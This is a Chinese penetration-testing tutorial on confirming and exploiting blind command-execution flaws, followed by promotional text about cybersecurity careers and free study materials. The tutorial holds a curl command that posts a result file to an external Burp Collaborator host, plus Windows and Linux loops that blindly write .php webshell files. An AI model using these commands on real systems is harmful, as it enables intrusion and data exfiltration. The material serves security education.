无回显条件下的命令执行判断和利用方式研究

一、引言

在渗透测试、漏洞挖掘或安全研究的过程中，我们会遇到很多无回显的命令执行点。面对这些无回显的命令执行点，我们很难获取命令执行结果，甚至无法判断命令是否执行成功。本篇文章主要讨论面对这些无回显的命令执行点时的判断和利用方法。

二、延时判断

首先我们需要知道该点是否存在命令执行漏洞，或者我们的命令是否执行成功了。这里的研判方法有很多种，最常用的是直接通过延时判断，类似我们sql注入里的时间盲注：

cmd=sleep 5

值得一提的是，windows下并没有sleep命令，那么如何通过时间延时的方式判断windows环境下的命令执行呢？我们可以通过回环ping来达到强制延时的效果：

ping -n 3 127.0.0.1

ping -n 4 127.0.0.1

 

Linux下同样试用，我们还可以通过ping命令在不同环境下的执行方式来判断目标的操作系统类型：

ping -c 3 127.0.0.1

ping -c 4 127.0.0.1

延时判断法是在无回显情况下最简单的判断方式，优点是能分辨操作系统、无论目标是否出网都能判断，缺点是只能判断不能利用。

三、流量监听

流量监听是渗透攻击者另一个常用的命令执行判断和利用方式，流量监听最重要的一个条件是目标系统必须能出网。

这里想先跟大家讨论下“出网”这一概念，我们所谓出不出网其实是要分不同环境和不同场景的。主要还是看防火墙和其他安全设备的配置策略，有全流量不出网、指定端口不出网、指定协议流量不出网等等。有的小伙伴在渗透时经常遇到明明dnslog能收到请求但是却无法通过nps等工具建立隧道的场景。抛开被监控软件拦截，最有可能的原因就是用户环境指定了tcp流量不出网。我们知道dns是应用层的协议，通常是基于udp的（部分极端情况也可使用tcp），因此dnslog能收到请求并不代表全流量都能出网。这种情况下我们就需要想办法建立一些其他协议的通信隧道，如dns隧道、icmp隧道等。

出网的情况下想要验证命令是否执行成功方法就太多了，我们可以用dnslog、httplog等进行漏洞验证，也可以直接建立反向代理隧道进行漏洞利用。在漏洞验证时推荐可以使用burp的Collaborator Client功能。这是一个类似httpslog+dnslog的插件，其功能要比dnslog强大，我们可以不用搭建任何环境就能监听dns和http请求，也可以很方便的查看post请求包和cookie等。Collaborator Client的使用方法如图：

dnslog监听示例：

Collaborator Client除了dns外也能记录http的请求包，我们可以把命令执行结果写在文件里，通过提交http参数的方式来查看命令执行结果。这种场景适合于没有正向访问路径的情况，如命令执行点不在web目录我们无法通过url直接访问命令执行的结果文件，只能反向提交数据或直接建立反向隧道。

这里我们保存命令执行结果到result.txt，执行以下命令通过Collaborator Client查看文件内容：

curl -X POST -F xx=@result.txt  http://ta7jsmzs6ydploiv0z9bpvkd046vuk.burpcollaborator.net

四、反弹shell

要利用一个命令执行点，最有效的方式便是反弹shell了。反弹shell的方式方法有很多，具体可以参考本公众号的上篇文章：

内网代理工具与检测方法研究

上一小节讲过，在tcp不出网的条件下我们可以使用dns隧道、icmp隧道、udp隧道等其他协议建立隧道。在无法用tcp协议下载远程工具的情况下，我们可以将exe程序通过powershell形式实现无文件运行。无文件的加载方式有很多，可以参考下面这篇文章：将EXE程序通过Powershell形式实现无文件运行 - Poacher's Blog

五、盲写文件

盲写文件同样适用于不出网的条件下，在全流量不出网时异常好用。我们知道在不出网的条件下建立正向连接是最有效的利用方式，而最稳定的正向连接当属webshell了。在知道web路径的情况下我们可以很方便的通过命令写入webshell，那么我们如何在不知道web路径的条件下盲写webshell呢？

盲写的思路是我们可以在网站访问的相对路径下找一个不常见的flag文件，以这个flag文件为基准利用操作系统的遍历语法在同级目录下写入webshell。

例如我们发现某站点存在一个名为sy-small-banner.png的图片，我们不需要知道该图片的绝对路径就可以通过下面的方式在该图片的同目录下创建一个名为sy-small-banner.png.php的文件。Windows下的盲写行方法：

for /r C:\  %i  in  (sy-small-banner*.png) do @echo  "test" > %i.php

我们可以遍历每一个盘符，直到文件写成功为止。Linux下的盲写方法：

for i in `find /home -name "sy-small-banner.png"`; do echo "text" >`basename $i`.php; done

实际渗透中最常见的盲写场景就是通过sql注入执行系统命令了，如果文件盲写不成功需要考虑站库分离等特殊情况。

 题外话

初入计算机行业的人或者大学计算机相关专业毕业生，很多因缺少实战经验，就业处处碰壁。下面我们来看两组数据：

• 2023届全国高校毕业生预计达到1158万人，就业形势严峻；
• 国家网络安全宣传周公布的数据显示，到2027年我国网络安全人员缺口将达327万。

一方面是每年应届毕业生就业形势严峻，一方面是网络安全人才百万缺口。

6月9日，麦可思研究2023年版就业蓝皮书（包括《2023年中国本科生就业报告》《2023年中国高职生就业报告》）正式发布。

2022届大学毕业生月收入较高的前10个专业

本科计算机类、高职自动化类专业月收入较高。2022届本科计算机类、高职自动化类专业月收入分别为6863元、5339元。其中，本科计算机类专业起薪与2021届基本持平，高职自动化类月收入增长明显，2022届反超铁道运输类专业（5295元）排在第一位。

具体看专业，2022届本科月收入较高的专业是信息安全（7579元）。对比2018届，电子科学与技术、自动化等与人工智能相关的本科专业表现不俗，较五年前起薪涨幅均达到了19%。数据科学与大数据技术虽是近年新增专业但表现亮眼，已跻身2022届本科毕业生毕业半年后月收入较高专业前三。五年前唯一进入本科高薪榜前10的人文社科类专业——法语已退出前10之列。

 “没有网络安全就没有国家安全”。当前，网络安全已被提升到国家战略的高度，成为影响国家安全、社会稳定至关重要的因素之一。 

网络安全行业特点

1、就业薪资非常高，涨薪快 2021年猎聘网发布网络安全行业就业薪资行业最高人均33.77万！

 2、人才缺口大，就业机会多

2019年9月18日《中华人民共和国中央人民政府》官方网站发表：我国网络空间安全人才 需求140万人，而全国各大学校每年培养的人员不到1.5W人。猎聘网《2021年上半年网络安全报告》预测2027年网安人才需求300W，现在从事网络安全行业的从业人员只有10W人。

 行业发展空间大，岗位非常多

网络安全行业产业以来，随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…

职业增值潜力大

网络安全专业具有很强的技术特性，尤其是掌握工作中的核心网络架构、安全技术，在职业发展上具有不可替代的竞争优势。

随着个人能力的不断提升，所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟，升值空间一路看涨，这也是为什么受大家欢迎的主要原因。

从某种程度来讲，在网络安全领域，跟医生职业一样，越老越吃香，因为技术愈加成熟，自然工作会受到重视，升职加薪则是水到渠成之事。

黑客&网络安全如何学习

今天只要你给我的文章点赞，我私藏的网安学习资料一样免费共享给你们，来看看有哪些东西。

 1.学习路线图 

 攻击和防守要学的东西也不少，具体要学的东西我都写在了上面的路线图，如果你能学完它们，你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源，但基本上都残缺不全的，这是我自己录的网安视频教程，上面路线图的每一个知识点，我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等，都是网络安全入门必知必会的学习内容。

 

 （都打包成一块的了，不能一一展开，总共300多集）

因篇幅有限，仅展示部分资料，需要保存下方图片，微信扫码即可前往获取

3.技术文档和电子书

技术文档也是我自己整理的，包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点，电子书也有200多本，由于内容的敏感性，我就不一一展示了。 

 因篇幅有限，仅展示部分资料，需要保存下方图片，微信扫码即可前往获取

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等，感兴趣的同学不容错过。 

 还有我视频里讲的案例源码和对应的工具包，需要的话也可以拿走。

因篇幅有限，仅展示部分资料，需要保存下方图片，微信扫码即可前往获取

 最后就是我这几年整理的网安方面的面试题，如果你是要找网安方面的工作，它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的，如果大家有好的题目或者好的见解欢迎分享。

参考解析：深信服官网、奇安信官网、Freebuf、csdn等

内容特点：条理清晰，含图像化表示更加易懂。

内容概要：包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

 因篇幅有限，仅展示部分资料，需要保存下方图片，微信扫码即可前往获取